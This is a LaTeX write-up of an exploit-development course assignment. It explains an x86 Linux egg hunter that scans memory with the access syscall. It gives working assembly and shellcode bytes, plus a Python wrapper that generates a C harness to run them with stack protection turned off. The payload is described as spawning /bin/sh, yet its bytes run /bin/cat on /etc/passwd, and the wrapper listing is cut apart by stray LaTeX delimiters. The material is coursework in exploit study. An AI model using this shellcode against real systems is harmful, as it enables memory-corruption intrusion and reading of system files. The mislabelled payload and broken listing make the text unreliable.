\documentclass{article} 
\title{Egg-hunter}
\author{Marco Nappi} 
\usepackage{listings}
\usepackage{geometry}
\geometry{
	a4paper,
	total={170mm,257mm},
	left=20mm,
	top=20mm,
}
\usepackage{hyperref}
\hypersetup{
	colorlinks=true,
	linkcolor=blue,
	filecolor=magenta,
	urlcolor=blue,
}
\begin{document}
\maketitle
\section*{SLAE Assignment 3}
The third assignment to obtain the study consist into study Egg- hunter and understand how it works.
\section*{The starting point}
This time we will start studying Asm code from skape's article
The article explains in detail how Egg-hunter works , we will focus on the access(2) version. An egg-hunter based on access2 syscall checks all Pages of the memory if are readable . The algorithm i have choose excludes a page if his first address is not accessible .How to know that ? using the access(2) syscall if the syscall returns 0xF2 or EFAULT code if the address is not accessible if it returns 0 the address we are looking at is accessible.If the first address of the page is accessible our egg-hunter will increase by one the address and it will check if our egg is there , to avoid mistake the egg i repeated twice so the egg-hunter will check if at location x is present our EGG , made by four hex bytes , then it will check again at location x + 4 if our egg is there if our egg is there wi will jump to that address if not we will continue to increase the address by one and if needed go to the next memory page.\\\\
For what are used egg-hunter ?\\
Egg-hunter are used to find a shellcode payload we have planted in the system without knowing were it is located .Then when the payload is found we will trigger it to run the planted payload.\\
A typical use of egg-hunter is when during a BoF we have few bytes to work whit.

\section*{A short Asm recap}
How to call a syscall using Asm in linux 86 ?\\
To call a syscall we have to work with the register like so:\\\\	
$\bullet$ In EAX we put the number of the syscall\\
$\bullet$ In EBX we put the first argument of the syscall\\
$\bullet$ In ECX we put the second argument of the syscall\\
$\bullet$ In EDX we put the third argument of the syscall\\
$\bullet$ In ESI we put the fourth argument of the syscall\\
$\bullet$ In EDI we put the fifth argument of the syscall\\\\
How mul op works in asm?:\\
In asm the mul operator use always as first number the value contained by eax than stores the value in eax:edx.This can be useful to set to zero a lot of register with fewer instruction

\section*{The Asm code analysis}
\begin{lstlisting}[language={[x86masm]Assembler}]

section .text
_start:
mov ebx,0x50905090 ; our egg 
xor ecx,ecx ; set to 0 ecx
mul ecx ; set to 0 aex and edx
jmp1: 
or  dx,0xFFF ; is a way to increase dx by 1000 and to go the next page address
jmp2:	
inc edx ;check if the next address on the page is valid
pusha ; saves the register value on the stack to keep them intact
lea ebx,[edx+0x04]
mov al,0x21 ; set the access sys-call
int 0x80 ; soft-interrupt to let the syscall run
cmp al,0xf2 ; compares if the return value is EFAULT
popa ; restore the registers
jz jmp1 ;if the cmp result is zero jumps to jmp1 and so the page is skipped
cmp [edx],ebx ; here is checked if the register contains the "egg"
jnz jmp2 ; if cmp doesn't return 0 the address is increased by one because the jmp2 loop
cmp [edx+0x04],ebx; we check again fot the "egg"
jnz jmp2 ; if we don't find the agg the adress is increased by one
because the jump2 loop 
jmp edx ; jumps to the address store in edx and the 2nd stage starts
\end{lstlisting}
\section*{The wrapper}
\subsection*{What it Does}
In this wrapper we have to create a wrapper that make easier the selection of the egg and of the payload.\\
The wrapper create the C file and make it executable \\
At the end , after the file is generated it print the compile command to help the user.\\
The payload , to test the egg-hunter used is :\\ Linux/x86 - execve(/bin/sh,0,0) - 21 bytes 
\subsection*{The Code}
\begin{lstlisting}[language=Python]
import os
egg="\\x50\\x90\\x50\\x90"

egghunter="\\xbb"+egg+"\\x31\\xc9\\xf7\\xe1\\x66\\x81\\xca\\xff\\x0f\\x42\\x60\\x8d\\x5a\\x04\\xb0\\x21\\xcd\\x80\\x3c\\xf2\\x61\\x74\\xed\\x39\\x1a\\x75\\xee\\x39\\x5a\\x04\\x75\\xe9\\xff\\xe2"
payload=egg*2+"\\x31\\xc0\\x99\\x52\\x68\\x2f\\x63\\x61\\x74\\x68\\x2f\\x62\\x69\\x6e\\x89\\xe3\\x52\\x68\\x73\\x73\\x77\\x64\\x68\\x2f\\x2f\\x70\\x61\\x68\\x2f\\x65\\x74\\x63\\x89\\xe1\\xb0\\x0b\\x52\\x51\\x53\\x89\\xe1\\xcd\\x80"

to_print=""

to_print+='''
\end{lstlisting}
\begin{lstlisting}[language=C]
#include <stdio.h>
#include <string.h>

unsigned char hunter[] = "'''+egghunter+'''";
unsigned char bind[] = "'''+payload+'''";

int main(void)
{
printf("Egg hunter length: %d", strlen(hunter));
printf("Shellcode length: %d", strlen(bind));

void (*s)() = (void *)hunter;
s();

return 0;
}
\end{lstlisting}
'''
\begin{lstlisting}[language=Python]
path="./egg.c"
file1 = open(path,'w')
file1.write(to_print)
os.system("chmod +x ./egg.c")
print("gcc -fno-stack-protector -z execstack -m32 egg.c -o egg")
\end{lstlisting}
\section*{Gitlab Repository}
Here it is the link to my SLAE repository:\\
\url{https://gitlab.com/mrcnpp/SLAE/-/tree/master/SLAE32}
\section*{References}
A good alternative to the man cmd is this site:\\
\url{https://man7.org/linux/man-pages/man2}\\
The link of the articles made by skape:\\
\url{https://gist.github.com/0xabe-io/916cf3af33d1c0592a90}
Thanks to all guys of the "Assemblers County" who helped me 
\section*{SLAE Statement}
This blog post has been	created	for	completing the requirements of the	SecurityTube Linux Assembly	Expert certification:\\
\url{http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert}\\
Student ID: SLAE-1545  
\end{document}